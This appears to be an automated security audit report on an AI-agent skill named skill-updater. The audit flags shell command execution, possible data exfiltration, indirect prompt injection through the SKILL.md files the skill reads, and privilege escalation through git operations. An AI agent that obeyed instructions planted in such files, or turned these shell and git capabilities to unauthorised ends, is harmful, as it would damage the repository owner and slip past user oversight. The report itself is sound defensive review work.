Skills
skills/ydnikolaev/antigravity-factory/skill-updater/Gen Agent Trust Hub

skill-updater

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
  • COMMAND_EXECUTION (HIGH): The skill uses multiple subprocess calls to execute shell commands like ls, grep, git, and make. This provides a direct path for arbitrary command execution if the skill is manipulated into running unauthorized commands.
  • DATA_EXFILTRATION (HIGH): The skill has broad read access to the file system (specifically the squads/ directory) and the ability to execute grep and git. This combination could be used to search for and stage sensitive information for exfiltration.
  • Indirect Prompt Injection (HIGH): As a 'Skill Updater', this tool reads external SKILL.md files and applies changes to them.
  • Ingestion points: Reads squads/*/SKILL.md, squads/TEAM.md, and squads/_standards/*.
  • Boundary markers: None identified; it lacks delimiters to separate instructions from the data it processes.
  • Capability inventory: Uses ls, grep, git checkout, git add, git commit, and make validate-all via shell.
  • Sanitization: None identified; the skill directly processes and modifies files based on patterns it finds in existing content.
  • Privilege Escalation (MEDIUM): The skill performs file system modifications and git operations (git checkout -b, git add, git commit). While intended for its folder, an attacker could potentially redirect these operations to sensitive areas of the repository.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 11:58 PM